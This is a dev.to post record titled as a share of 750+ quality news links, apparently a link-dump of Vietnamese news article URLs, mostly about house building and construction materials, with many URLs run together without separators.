709,005 | Chia sẻ 750+ link báo hay và chất lượng | http://baobinhduong.vn/xay-nha-dac-biet-de-an-nau-trong-ngay-tan-the-a87204.htmlhttps://baotayninh.vn... | 0 | 2021-05-26T09:50:34 | https://dev.to/kinhennho/chia-s-750-link-bao-hay-va-ch-t-l-ng-1ik | linkbaochatluong, linkbaohay | http://baobinhduong.vn/xay-nha-dac-biet-de-an-nau-trong-ngay-tan-the-a87204.htmlhttps://baotayninh.vn/xay-nha-nhan-ai-cho-thanh-nien-ngheo-a114790.htmlhttp://hatinh24h.com.vn/nguoi-dan-chi-hang-tram-trieu-dong-xay-nha-lau-cho-heo-tranh-lu-a77072.htmlhttp://baolangson.vn/quoc-te/324262-australia-chi-hon-700-trieu-usd-xay-nha-may-san-xuat-vacxin.htmlhttps://baodansinh.vn/lai-suat-cho-vay-xay-nha-o-xa-hoi-la-45---5nam-22999.htmhttp://hatinh24h.com.vn/nam-tan-suu-2021-xay-nha-theo-nhung-huong-nay-mang-lai-dai-cat-dai-loi-a149268.htmlhttps://giaoducthoidai.vn/kinh-te-xa-hoi/nam-2021-truong-hop-xay-nha-o-nao-duoc-mien-giay-phep-xay-dung-AiT1tqAGR.htmlhttps://baodansinh.vn/quang-binh-phan-bo-them-17-ty-dong-xay-nha-o-phong-tranh-bao-lut-cho-ho-ngheo-58599.htmhttps://baothuathienhue.vn/dieu-kien-ho-kinh-doanh-duoc-tham-do-khoang-san-lam-vat-lieu-xay-dung-thong-thuong-a34984.htmlhttp://nghean24h.vn/xay-nha-pho-sai-gon-35-tang-co-san-vuon-voi-13-ty-a505359.htmlhttps://baotayninh.vn/750-trieu-dong-xay-nha-mai-am-mobifone-a86607.htmlhttps://daklak24h.com.vn/kinh-te/18657/dung-chuyen-dat-rung-de-xay-nha-may-thuy-dien-drang-phok.htmlhttp://thanhnienviet.vn/2019/11/08/pham-tam-tai-co-xay-nha-nam-2020-duoc-khong/http://hatinh24h.com.vn/ha-tinh-nguon-vat-lieu-xay-dung-doi-dao-dang-bi-bo-quen-a108273.htmlhttps://reatimes.vn/bien-dong-gia-nha-o-va-vat-lieu-xay-dung-gop-phan-tang-013-cpi-thang-11-20191129115245860.htmlhttp://baolangson.vn/quoc-te/305166-nhat-ban-ky-thoa-thuan-xay-nha-may-dien-mat-troi-lon-dau-tien-o-qatar.htmlhttps://reatimes.vn/de-xuat-xay-nha-hat-1500-ty-dong-o-thu-thiem-bang-tien-ban-dau-gia-khu-dat-23-le-duan-29908.htmlhttps://www.bienphong.com.vn/xay-nha-tang-tre-mo-coi-post21182.htmlh
ttps://tieudungplus.vn/nganh-vat-lieu-xay-dung-lao-dao-truoc-kho-khan-kep-20200328212557128.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/70984/title/Bo-Tu-lenh-Bo-doi-Bien-phong-Ho-tro-60-trieu-dong-xay-nha-tinh-nghia-http://vinh24h.vn/ngang-nhien-bit-duong-xuong-bien-de-chua-vat-lieu-xay-dung-a113018.htmlhttps://reatimes.vn/doi-von-xay-nha-cho-nguoi-thu-nhap-thap-28109.htmlhttps://baoangiang.com.vn/cho-moi-phat-dong-ho-tro-xay-nha-cho-ho-ngheo-giai-doan-2020-2025-a278152.htmlhttp://baoyenbai.com.vn/18/138195/Lanh_dao_Israel_tiep_tuc_phe_duyet_ke_hoach_xay_nha_dinh_cu_moi.aspxhttps://reatimes.vn/tre-vat-lieu-xay-dung-hoan-hao-cho-cong-trinh-xanh-19412.htmlhttp://hatinh24h.com.vn/tu-van-xay-nha-ba-tang-850-trieu-o-sai-gon-a91054.htmlhttps://tieudungplus.vn/san-pham-hang-hoa-vat-lieu-xay-dung-dua-ra-thi-truong-phai-dat-tieu-chuan-da-cong-bo-20201231000000916.htmlhttps://giaoducthoidai.vn/gia-dinh/tuoi-nao-xay-nha-nam-tan-suu-2021-de-don-duoc-cat-lanh-OQtvC0LMg.htmlhttps://reatimes.vn/go-doc-can-se-lam-mua-lam-gio-tai-thi-truong-vat-lieu-xay-dung-chau-a-2776.htmlhttp://baobinhduong.vn/bai-tap-ket-vat-lieu-xay-dung-anh-huong-cuoc-song-nguoi-dan-chinh-quyen-dia-phuong-vao-cuoc-xu-ly-a222440.htmlhttp://baoquangtri.vn/Xa-hoi/modid/420/ItemID/58444/title/Hon-3-ti-dong-xay-nha-cong-vu-cho-giao-vien-https://reatimes.vn/doanh-nghiep-nganh-vat-lieu-xay-dung-can-duoc-ho-tro-ve-chinh-sach-1608694278526.htmlhttp://danang24h.vn/tu-nam-2021-dat-quy-hoach-treo-van-co-the-xay-nha-moi-a157037.htmlhttp://nghean24h.vn/kinh-cuong-luc-bat-ngo-vo-roi-trung-dau-em-be-dang-choi-trong-nha-khien-nhieu-nguoi-hoang-so-a585837.htmlhttps://reatimes.vn/tphcm-xay-nha-hat-khong-anh-huong-den-loi-ich-nguoi-dan-thu-thiem-401012.htmlhttps://reatimes.vn/doanh-nghiep-san-xuat-vat-lieu-xay-dung-viet-noi-lo-doi-pho-hang-trung-quoc-17330.htmlhttps://baotuyenquang.com.vn/xa-hoi/cuoc-song/ho-tro-ho-ngheo-xay-nha-ve-sinh-124058.htmlhttps://baodansinh.vn/lao-cai-xay-nha-ve-sinh-nha-tam-cho-cac-truong-hoc-77
851.htmhttp://hatinh24h.com.vn/ba-noi-lo-khi-xay-nha-a109254.htmlhttps://baodansinh.vn/cap-giay-phep-lao-dong-va-xay-nha-cho-nguoi-lao-dong-tai-kcnc-hoa-lac-59835.htmhttps://nguoidothi.net.vn/canh-bao-ve-cuoc-chay-dua-xay-nha-may-dien-mat-troi-16259.htmlhttps://baodansinh.vn/gia-lai-dung-dat-xay-nha-may-lam-san-tap-danh-golf-97017.htmhttp://baobinhduong.vn/khuyen-khich-doanh-nghiep-san-xuat-vat-lieu-xay-dung-ap-dung-cong-nghe-moi-a219681.htmlhttp://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/137129/title/Can-som-khac-phuc-viec-xay-nha-chong-len-duong-giao-thonghttps://baoangiang.com.vn/nhat-ban-phan-doi-nga-xay-nha-trai-tai-cac-dao-tranh-chap-a236986.htmlhttps://www.bienphong.com.vn/bdbp-da-nang-van-dong-200-trieu-dong-xay-nha-tinh-nghia-post88845.htmlhttps://baotayninh.vn/vu-xay-nha-lan-chiem-hem-cong-cong-lai-xin-hop-thuc-hoa-xin-chu-truong-ban-dat-cho-nguoi-lan-chiem-dat-cong--a41958.htmlhttps://baodansinh.vn/nguoi-xay-nha-cho-chim-yen-dem-ca-phao-mam-tom-tan-cong-thi-truong-my-7314.htmhttps://baotayninh.vn/bo-xay-dung-chinh-sach-ho-tro-nguoi-ngheo-xay-nha-hien-nay-la-phu-hop-a89776.htmlhttp://nghean24h.vn/nguoi-than-bi-thu-xa-xay-nha-trai-phep-tren-dat-nong-nghiep-a512340.htmlhttps://baodansinh.vn/khong-su-dung-von-nha-nuoc-xay-nha-ga-t3-san-bay-tan-son-nhat-20200114150000201.htmhttp://baoyenbai.com.vn/22/45476/Hon_865_trieu_USD_xay_nha_may_nhiet_dien_Thang_Long.aspxhttp://baolangson.vn/xa-hoi/37950-phong-trao-hien-dat-xay-nha-van-hoa-thon-o-dong-buc.htmlhttps://nguoidothi.net.vn/thu-tuong-chua-xay-nha-cao-tang-khi-phuong-an-giao-thong-chua-co-loi-ra-6681.htmlhttps://reatimes.vn/ha-noi-lenh-xu-ly-tinh-trang-no-ro-xay-nha-tren-dat-nong-nghiep-20200229223018669.htmlhttp://baobinhduong.vn/tan-hiep-phat-dau-tu-4-000-ty-dong-xay-nha-may-nuoc-giai-khat-o-hau-giang-a197754.htmlhttp://baolangson.vn/xa-hoi/42844-ldld-tinh-tham-va-ho-tro-kinh-phi-xay-nha-mai-am-tinh-thuong-cho-doan-vien-lao-dong-ngheo.htmlhttps://reatimes.vn/5-bi-quyet-de-xay-nha-sieu-nho-ban-khong-
nen-bo-qua-23394.htmlhttp://baolangson.vn/quoc-te/100898-can-danh-gia-toan-dien-ve-anh-huong-cua-du-an-thuy-dien-xay-nha-bu-ri.htmlhttps://baodansinh.vn/yeu-da-lat-cap-vo-chong-9x-quyet-roi-sai-gon-ve-xay-nha-vuon-binh-yen-song-cuoc-song-mo-uoc-22202027155021600.htmhttp://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thua-2-tran-lien-tiep-a236569.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/66290/title/Xay-nha-tinh-thuong-cho-phu-nu-ngheo-https://baodongkhoi.vn/dai-hoi-chi-bo-3-thuoc-dang-bo-cong-ty-co-phan-vat-lieu-xay-dung-nhiem-ky-2018-2020-31032018-a48061.htmlhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/95791/title/Giai-ngan-von-vay-xay-nha-phong-tranh-bao-lu-cho-ho-ngheohttp://baoquangtri.vn/Kinh-te/modid/419/ItemID/25590/title/Hoi-Phu-nu-tinh-Quang-Tri-Ho-tro-tren-977-trieu-dong-xay-nha-Dai-doan-ket-cho-ho-ngheo-http://hatinh24h.com.vn/tp-ha-tinh-xe-cho-vat-lieu-xay-dung-lam-hong-duong-a2618.htmlhttp://baoyenbai.com.vn/13/45592/12_trieu_USD_xay_nha_chong_bao_lu_cho_nguoi_ngheo.aspxhttp://baoyenbai.com.vn/18/64983/Trung_Quoc_se_xay_nha_may_dien_hat_nhan_gan_Viet_Nam.aspxhttp://thanhnienviet.vn/2019/10/24/nguoi-nhat-xay-nha-ong-30m2-gon-xinh-ma-van-thoang-dang/https://reatimes.vn/phat-trien-vat-lieu-xay-dung-ben-vung-khoa-hoc-cong-nghe-phai-di-truoc-1607660355639.htmlhttps://reatimes.vn/dat-xay-nha-o-cho-cong-nhan-ai-huong-loi-36391.htmlhttp://baolangson.vn/xa-hoi/37701-dak-nong-dau-tu-150-ty-dong-xay-nha-tang-dong-bao-dan-toc-thieu-so-ngheo.htmlhttp://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/104793/title/De-nghi-truy-to-can-bo-phuong-bao-ke-xay-nha-trai-phep-https://baodansinh.vn/thanh-hoa-xay-nha-may-xu-ly-rac-thai-gan-650-ty-dong-44671.htmhttps://reatimes.vn/thi-truong-bat-dong-san-kem-soi-dong-gia-vat-lieu-xay-dung-cuoi-nam-the-nao-20190923160936837.htmlhttp://thanhnienviet.vn/2021/02/16/porsche-khong-co-y-dinh-xay-nha-may-hay-lap-rap-o-to-o-trung-quoc-vi-khach-muon-xe-san-xuat-tai-duc/https://baodansinh.vn/cong-ty-dien-luc-ha
-tinh-xay-nha-tinh-nghia-tang-me-viet-nam-anh-hung-66632.htmhttps://reatimes.vn/tphcm-thao-do-cac-thuy-dai-de-xay-nha-giu-xe-cao-tang-8802.htmlhttps://reatimes.vn/that-bai-cua-nguoi-dan-ba-xay-nha-4899.htmlhttps://www.bienphong.com.vn/ho-tro-30-trieu-dong-xay-nha-o-cho-ho-giao-dan-o-vinh-an-post17954.htmlhttp://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thang-hang-doi-manh-2019-chien-thang-cua-long-qua-cam-a190578.htmlhttp://baoquangtri.vn/Xa-hoi/modid/420/ItemID/17175/title/Xay-nha-cho-sinh-vien-Kien-nghi-dau-tu-tiep-4800-ty-donghttp://nghean24h.vn/chia-nhau-3000-ty-ca-lang-xay-nha-lau-sam-o-to-a513114.htmlhttps://baodongkhoi.vn/cuu-chien-binh-duong-van-an-ho-tro-xay-nha-nghia-tinh-dong-doi-05072012-a24638.htmlhttp://thanhnienviet.vn/2020/10/23/ai-noi-me-don-than-thi-khong-the-xay-nha-tien-ty/http://baoyenbai.com.vn/12/157601/Mitsubishi_Motors_se_xay_nha_may_san_xuat_oto_thu_hai_tai_Viet_Nam.aspxhttp://vinh24h.vn/nghe-an-chi-dao-xu-ly-su-dung-tro-xi-thach-cao-lam-vat-lieu-xay-dung-a136830.htmlhttp://hatinh24h.com.vn/xay-nha-ong-2-tang-3-phong-ngu-hien-dai-sang-trong-chang-bao-gio-loi-mot-gia-chua-toi-400-trieu-a74422.htmlhttp://nguoilambao.vn/hau-covid-19-nganh-vat-lieu-xay-dung-vuot-kho-de-phuc-hoi-n18613.htmlhttps://baodansinh.vn/ninh-binh-xay-nha-mai-am-tinh-thuong-nha-nhan-ai-cho-hoi-vien-hoi-phu-nu-20191018141229422.htmhttps://www.bienphong.com.vn/khoi-cong-xay-nha-dai-doan-ket-cho-phu-nu-ngheo-don-than-post437603.htmlhttp://baoyenbai.com.vn/12/69191/Nhat_Ban_se_xay_nha_may_loc_dau_lon_nhat_Viet_Nam__.aspxhttps://reatimes.vn/don-doc-chuyen-muc-dan-ong-xay-nha-cung-anh-chanh-van-hoang-anh-tu-3991.htmlhttps://tieudungplus.vn/vat-lieu-xay-dung-sinh-hoc-doi-song-xanh-kinh-te-vung-31657.htmlhttps://reatimes.vn/chai-nhua-bo-di-tro-thanh-gach-xay-nha-19904.htmlhttp://baobinhduong.vn/xay-nha-sai-vi-tri-dat-keo-theo-nhieu-he-luy--a233765.htmlhttps://baodansinh.vn/mat-2-nam-de-tiet-kiem-19-ty-de-mua-dat-xay-nha-vo-chong-tre-da-thuc-hien-giac-mo-voi-ngo
i-nha-nho-xinh-2220205722311397.htmhttp://baoquangtri.vn/Thoi-su/modid/445/ItemID/57030/title/Trieu-Phong-Phat-trien-manh-nganh-san-xuat-khai-thac-vat-lieu-xay-dung-https://baodansinh.vn/hoang-mainghe-an-thi-nhau-xay-nha-cho-boi-thuong-15435.htmhttps://reatimes.vn/khong-co-vat-lieu-xay-dung-than-thien-thi-khong-the-co-cong-trinh-xanh-8241.htmlhttps://reatimes.vn/tuoi-nao-xay-nha-phat-tai-nhat-nam-dinh-dau-2017-3883.htmlhttp://baobinhduong.vn/trung-tam-nhan-dao-que-huong-khoi-cong-xay-nha-o-va-truong-tieu-hoc-a74401.htmlhttps://www.bienphong.com.vn/don-bien-phong-tri-le-khoi-cong-xay-nha-moi-cho-tre-mo-coi-post315209.htmlhttp://baolangson.vn/chinh-tri/15173-tong-bi-thu-chu-tich-nuoc-lao-chum-ma-ly-xay-nha-xon-tiep-doan-dai-bieu-dang-ta.htmlhttps://reatimes.vn/binh-duong-xay-nha-o-xa-hoi-100-200-trieu-can-the-nao-400031.htmlhttps://baodansinh.vn/ha-tinh-vietinbank-ho-tro-xay-nha-tinh-nghia-cho-nguoi-gia-don-than-kho-khan-20200524081548528.htmhttps://baotayninh.vn/dat-nao-vet-kenh-tieu-bau-coi-se-duoc-dung-lam-vat-lieu-xay-dung-a3501.htmlhttps://reatimes.vn/doanh-nghiep-go-roi-diem-nghen-trong-bai-toan-xay-nha-o-xa-hoi-25265.htmlhttp://thanhnienviet.vn/2020/07/01/vo-chong-tre-xay-nha-3-tang-chuan-sang-xin-min-voi-chi-phi-bat-ngo/https://reatimes.vn/trung-quoc-xay-nha-ve-sinh-bang-kinh-trong-suot-de-du-khach-tien-ngam-canh-1365.htmlhttp://thanhhoa24h.net.vn/yen-thanh-nghe-an-ngang-nhien-chiem-duong-trong-cay-xay-nha-a20612.htmlhttps://reatimes.vn/thi-truong-vat-lieu-xay-dung-san-sang-de-vuon-ra-the-gioi-31939.htmlhttp://thanhnienviet.vn/2019/11/23/xay-nha-nhat-dinh-phai-biet-ro-nhung-loai-mong-co-ban-sau/http://tintucmientay.com.vn/tien-giang-de-nghi-lam-ro-vu-xay-nha-tinh-thuong-nhieu-khuat-tat-a119478.htmlhttp://nghean24h.vn/bo-het-cac-thiet-bi-chong-trom-di-chi-can-hoc-cach-xay-nha-chong-trom-cuc-hieu-qua-nay-cua-nguoi-nhat-a482524.htmlhttps://reatimes.vn/han-quoc-xay-nha-may-san-xuat-dong-co-may-bay-o-hoa-lac-15049.htmlhttps://giaoducthoidai.vn/ket-noi/dak-nong-co-g
http://baolangson.vn/giao-duc/162097-nam-hoc-moi-can-quan-tam-dau-tu-xay-nha-ve-sinh-trong-truong-hoc.html
http://antt.vn/mua-dat-du-an-duoc-phe-duyet-20-nam-van-khong-the-xay-nha-295059.htm
https://baodansinh.vn/thua-thien-hue-tiep-nhan-500-trieu-dong-ho-tro-xay-nha-chong-lu-cho-nguoi-dan-20201116151624235.htm
https://baodansinh.vn/nghe-an-xay-nha-tinh-nghia-tham-tinh-quan-dan-20200828114620783.htm
https://nguoidothi.net.vn/tp-hcm-siet-chat-du-an-xay-nha-cao-tang-trong-khu-trung-tam-nen-trien-khai-som-25452.html
https://reatimes.vn/chi-so-vi-mo-thang-12-2018-cpi-nha-o-va-vat-lieu-xay-dung-giam-089-32530.html
http://baobinhduong.vn/so-xay-dung-trien-khai-quy-chuan-quoc-gia-ve-san-pham-hang-hoa-vat-lieu-xay-dung-a120125.html
http://thanhnienviet.vn/2021/01/13/gia-chu-soc-trang-xay-nha-ong-de-chiu-nhu-resort-tren-manh-dat-vua-hep-vua-dai/
https://baothuathienhue.vn/bao-hiem-xa-hoi-viet-nam-xay-nha-tinh-nghia-a29533.html
https://reatimes.vn/thi-truong-vat-lieu-xay-dung-nhan-tin-hieu-moi-dau-quy-ii-24059.html
http://thanhhoa24h.net.vn/16-nam-nuoi-uoc-nguyen-xay-nha-tho-to-cua-hoai-linh-a42047.html
http://baobinhduong.vn/phe-duyet-chien-luoc-phat-trien-vat-lieu-xay-dung-a229624.html
https://baodansinh.vn/vat-lieu-xay-dung-an-toan-than-thien-voi-moi-truong-va-xu-huong-su-dung-2020070209554358.htm
https://baodansinh.vn/san-khau-tu-te-khong-the-xay-nha-tu-noc-57457.htm
https://reatimes.vn/da-nang-xay-nha-chong-bao-cho-phu-nu-ngheo-7434.html
http://baolangson.vn/quoc-te/113222-israel-tiep-tuc-cap-phep-xay-nha-dinh-cu-tai-dong-jerusalem.html
https://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/giam-dien-tich-khu-cong-nghiep-trang-due-de-xay-nha-o-cho-cong-nhan-76192.html
http://thanhnienviet.vn/2020/05/16/cach-xay-nha-tiet-kiem-chi-phi-nhat-5-kinh-nghiem-khong-phai-ai-cung-biet/
http://hatinh24h.com.vn/ha-tinh-ho-bien-hanh-lang-quoc-lo-thanh-bai-tap-ket-vat-lieu-xay-dung-a8566.html
https://nguoidothi.net.vn/tp-hcm-phan-cap-xu-ly-cac-truong-hop-lan-chiem-kenh-rach-xay-nha-o-cong-trinh-22231.html
http://danang24h.vn/da-nang-via-he-tuyen-kenh-bac-son-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-a113041.html
https://nguoidothi.net.vn/tp-hcm-nghien-cuu-khong-cap-phep-xay-nha-rieng-le-9301.html
http://nghean24h.vn/nghe-an-chi-dao-xu-ly-su-dung-tro-xi-thach-cao-lam-vat-lieu-xay-dung-a587711.html
http://nguoihanoi.com.vn/da-nang-siet-xay-nha-cao-tang-tai-khu-vuc-trung-tam_247049.html
https://baotayninh.vn/vu-xay-nha-lan-hem-cong-cong-xin-hop-thuc-hoa-vi-sao-cac-co-quan-quan-ly-trat-tu-do-thi-chua-kien-quyet-xu-ly-a41833.html
https://baodansinh.vn/thanh-hoa-trao-tang-xe-lan-cho-cac-chau-bai-nao-va-ho-tro-xay-nha-59884.htm
http://hatinh24h.com.vn/geleximco-muon-xay-nha-may-nhiet-dien-ty-usd-voi-doi-tac-trung-quoc-a93858.html
http://baobinhduong.vn/dau-gia-quyen-khai-thac-khoang-san-lam-vat-lieu-xay-dung-thong-thuong-a194512.html
http://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/146249/title/Hoi-am-vu-xay-nha-tren-duong-giao-thong-o-thon-Tra-Loc-xa-Hai-Xuan-huyen-Hai-Lang-Da-thao-do-phan-nha-xay-dung-tren-duong-giao-thong
https://baodansinh.vn/la-lung-chuyen-xay-nha-tro-de-nuoi-ga-o-nghe-an-36672.htm
http://baolangson.vn/chinh-tri/8405-thao-go-vuong-mac-trong-xay-nha-o-cho-nguoi-ngheo-tai-an-giang.html
https://tieudungplus.vn/dat-nuoi-trong-thuy-san-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-38654.html
https://giaoducthoidai.vn/khoa-hoc/vat-lieu-xay-dung-lam-gia-tang-o-nhiem-khong-khi-3829981.html
http://baolangson.vn/xa-hoi/29377-tu-nam-2011-su-dung-gach-khong-nung-loai-nhe-de-xay-nha-cao-tang.html
http://baoyenbai.com.vn/18/128667/Ukraine_huy_bo_thoa_thuan_xay_nha_may_dien_hat_nhan_voi_Nga.aspx
http://baolangson.vn/xa-hoi/37271-ha-noi-day-manh-xay-nha-cho-cong-nhan-sinh-vien.html
http://thanhnienviet.vn/2020/10/14/tp-hcm-tiep-tuc-han-che-xay-nha-cao-tang-tai-quan-1-quan-3/
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thanh-cong-den-tu-gian-kho-a214943.html
https://giaoducthoidai.vn/phap-luat/ha-noi-ke-sat-hai-ba-chu-cua-hang-vat-lieu-xay-dung-roi-nem-xac-ngoai-bai-rac-khai-gi--3799072.html
https://giaoducthoidai.vn/van-hoa/vu-hoang-viet-xay-nha-pho-10-ty-dat-vang-bat-ngo-nam-o-tren-tang-thuong-3802736.html
http://thanhhoa24h.net.vn/du-an-gach-khong-nung-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-a142686.html
https://giaoducthoidai.vn/phap-luat/hieu-truong-lan-chiem-dat-hang-tram-m2-duong-dan-sinh-xay-nha-chinh-quyen-bat-luc--3825793.html
http://thanhnienviet.vn/2020/05/06/ban-hanh-quy-chuan-xay-nha-tro-tai-tp-hcm/
https://reatimes.vn/kho-khan-bua-vay-doanh-nghiep-vat-lieu-xay-dung-20200401092747080.html
http://baobinhduong.vn/xay-nha-dai-doan-ket-cho-nguoi-ngheo-tiep-them-dong-luc-de-nguoi-ngheo-vuon-len-a233143.html
http://nghean24h.vn/tu-van-xay-nha-hai-tang-60m2-kinh-phi-598-trieu-dong-a511745.html
https://baotayninh.vn/xay-nha-khong-dung-hop-dong-bi-kien-ra-toa-a43230.html
https://baoangiang.com.vn/cho-moi-hop-mat-chuc-sac-chuc-viec-cac-ton-giao-dan-toc-cac-doi-xay-nha-thi-cong-cau-duong-a294940.html
http://hatinh24h.com.vn/kinh-hoang-canh-kinh-cuong-luc-phat-no-gam-day-nguoi-nhu-dan-hoa-cai-a68345.html
http://thanhhoa24h.net.vn/dap-mai-khong-vo-kinh-cuong-luc-2-ten-cuop-tuc-dien-a397.html
https://baodansinh.vn/dan-ba-vua-xay-nha-vua-xay-to-am-17072.htm
http://antt.vn/dung-xay-nha-hat-hoa-sen-lon-nhat-thu-do-239654.htm
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-giac-mo-viet-tiep-cau-chuyen-co-tich-a222853.html
https://reatimes.vn/vi-pham-ve-san-xuat-vat-lieu-xay-dung-co-su-dung-amiang-trang-phat-den-90-trieu-dong-19062.html
https://nguoidothi.net.vn/muon-xay-nha-tren-dat-nong-nghiep-phai-lam-sao-7763.html
http://thanhhoa24h.net.vn/viet-nam-xay-nha-may-dien-hat-nhan-10-nam-nua-cung-khong-co-a161158.html
https://reatimes.vn/lieu-donald-trump-co-phat-trien-nganh-vat-lieu-xay-dung-my-nhu-da-hua-2893.html
http://thanhnienviet.vn/2021/03/04/bo-tui-kinh-nghiem-mua-dat-tho-cu-xay-nha-o/
https://baothuathienhue.vn/ke-hoach-xay-nha-o-xa-hoi-cho-cong-nhan-moi-chi-dat-hon-40--a95006.html
http://baoyenbai.com.vn/16/83048/Khai_quat_khao_co_hoc_xu_ly_di_doi_di_tich_di_vat_khu_vuc_xay_Nha_Quoc_hoi__.aspx
https://nguoidothi.net.vn/xay-nha-o-tren-dat-nguoi-khac-co-duoc-cap-so-do-26662.html
http://nghean24h.vn/mac-ho-henh-lo-vong-1-hoi-chi-em-nhan-du-gach-xay-nha-a613027.html
http://hoinhabaovietnam.vn/Da-Nang-Dau-tu-8000-ti-dong-xay-nha-o-xa-hoi-cho-NLD-kho-khan_n73180.html
http://antt.vn/thanh-hoa-bat-thuong-vu-xay-nha-may-nuoc-sach-ngoai-quy-hoach-24652.htm
http://baobinhduong.vn/vat-lieu-xay-dung-binh-duong-tru-hang-thanh-cong-a236961.html
http://baolangson.vn/kinh-te/62998-xay-nha-may-san-xuat-amon-nitrat-tai-thai-binh.html
http://thanhnienviet.vn/2020/06/27/5-nam-tich-tien-mua-dat-doi-10-nam-van-khong-duoc-phep-xay-nha/
https://baodansinh.vn/hdbank-ho-tro-xay-nha-cho-ho-ngheo-mien-nui-quang-ninh-20191005161128425.htm
https://baotuyenquang.com.vn/xa-hoi/cuoc-song/yen-son-chung-tay-xay-nha-dai-doan-ket-138122.html
https://www.bienphong.com.vn/bdbp-ho-tro-xay-nha-cho-ho-ngheo-o-cac-xa-bien-gioi-post342081.html
https://baodansinh.vn/nghe-an-phat-hien-qua-bom-270-kg-khi-dao-mong-xay-nha-74125.htm
http://baolangson.vn/xa-hoi/39068-43-300-ho-ngheo-tay-nguyen-duoc-ho-tro-xay-nha-moi.html
http://nghean24h.vn/vu-chay-14-nguoi-chet-lo-dien-ong-chu-dai-gia-xay-nha-khap-sai-gon-a517875.html
https://baothuathienhue.vn/corning-ra-mat-kinh-cuong-luc-cho-may-tinh-bang-va-tv-a72098.html
http://antt.vn/de-xay-ra-xay-nha-trai-phep-hang-loat-bi-thu-chu-tich-o-nghe-an-bi-ky-luat-309646.htm
http://baoyenbai.com.vn/12/88633/Cam_xuat_khau_8_loai_khoang_san_lam_vat_lieu_xay_dung.aspx
http://nghean24h.vn/vi-sao-ca-ngan-ho-dan-tu-choi-nhan-ho-tro-xay-nha-tranh-lu-a442434.html
https://baolongan.vn/viet-nam-cuba-huong-toi-lien-doanh-san-xuat-vat-lieu-xay-dung-a20238.html
http://antt.vn/dai-gia-xay-nha-40-ti-cho-sinh-vien-tang-xe-camry-con-minh-chay-xe-may-cui-bap-8564.htm
https://baodansinh.vn/thanh-hoa-khoi-cong-xay-nha-khan-quang-do-cho-hoc-sinh-mo-coi-20200325163628975.htm
http://baoquangtri.vn/Kinh-te/modid/419/ItemID/95560/title/Huy-dong-moi-nguon-luc-de-giup-ho-ngheo-xay-nha-phong-tranh-bao-lu
https://daklak24h.com.vn/xa-hoi/23431/khoi-cong-xay-nha-tang-ho-ngheo.html
https://baolongan.vn/gan-1-5-ti-dong-xay-nha-tinh-nghia-tinh-thuong-a9709.html
http://baolangson.vn/quoc-te/110577-israel-thuc-day-cac-ke-hoach-xay-nha-dinh-cu-tai-jerusalem.html
https://reatimes.vn/cach-phu-nu-thong-minh-tham-gia-vao-viec-xay-nha-de-thuan-vo-thuan-chong-7112.html
https://nguoidothi.net.vn/tp-hcm-chan-chinh-nan-bao-ke-chia-lo-ban-nen-xay-nha-khong-phep-tren-dat-nong-nghiep-23847.html
https://tieudungplus.vn/tphcm-de-xuat-xay-nha-hat-giao-huong-hon-1500-ty-tai-thu-thiem-28565.html
http://nghean24h.vn/gan-10-nam-toi-di-xe-buyt-de-danh-tien-mua-dat-xay-nha-a487143.html
http://thanhnienviet.vn/2017/07/06/luong-3-4-trieu-ma-xay-nha-lau-di-xe-hoi-du-luan-nghi-ngo-la-dung/
https://baothuathienhue.vn/siet-chat-kiem-tra-o-to-cho-vat-lieu-xay-dung-a84346.html
https://baodansinh.vn/hon-800-ty-dong-xay-nha-may-dien-mat-troi-thanh-hoa-57669.htm
https://baotayninh.vn/tan-chau-khoi-cong-xay-nha-cong-vu-cho-giao-vien-mam-non-a8834.html
http://hatinh24h.com.vn/xay-nha-moi-sang-xin-nhu-trung-tam-giai-tri-viet-anh-giau-co-nao-a144663.html
http://baoyenbai.com.vn/12/41212/Dieu_chinh_gia_va_hop_dong_xay_dung_do_bien_dong_gia_nguyen_lieu_nhien_lieu_va_vat_lieu_xay_dung.aspx
https://tieudungplus.vn/xay-nha-moi-can-tuan-thu-nguyen-tac-phong-thuy-nao-11704.html
http://baoyenbai.com.vn/227/46636/Long_ga_co_the_lam_vat_lieu_xay_dung.aspx
http://thanhhoa24h.net.vn/hieu-truong-len-lut-xay-nha-tren-dat-cong-vao-ban-dem-a109815.html
https://reatimes.vn/muc-boi-thuong-khi-xay-nha-lam-anh-huong-den-hang-xom-1430.html
https://reatimes.vn/chi-so-gia-tieu-dung-nha-o-va-vat-lieu-xay-dung-tang-034-trong-thang-5-25525.html
https://baoangiang.com.vn/bidv-ho-tro-tren-10-ty-dong-xay-nha-truong-hoc-va-tang-qua-tet-cho-nguoi-dan-an-giang-a217198.html
https://baothuathienhue.vn/xu-phat-cong-ty-co-phan-vat-lieu-xay-dung-huong-ho-90-trieu-dong-a91683.html
http://baobinhduong.vn/khai-truong-phong-giao-dich-bao-loc-acb-tang-100-trieu-dong-xay-nha-tinh-thuong-a29270.html
https://daklak24h.com.vn/xa-hoi/8117/chi-bo-cong-ty-co-phan-vat-lieu-xay-dung-20-vung-vang-trong-gian-kho.html
https://baothuathienhue.vn/huong-tra-xay-nha-tinh-thuong-cho-hoi-vien-nong-dan-co-hoan-canh-kho-khan-a70792.html
https://baodansinh.vn/2-3-ty-dong-xay-nha-noi-tru-cho-hoc-sinh-truong-thcs-xa-thuan-mang-ngan-son-bac-can-12093.htm
http://thanhnienviet.vn/2020/07/01/da-nang-so-noi-vu-de-nghi-thu-hoi-cong-van-dung-cap-phep-xay-nha-o-ket-hop-thuong-mai-dich-vu/
http://hatinh24h.com.vn/huong-son-vat-lieu-xay-dung-tan-cong-truong-hoc-a7665.html
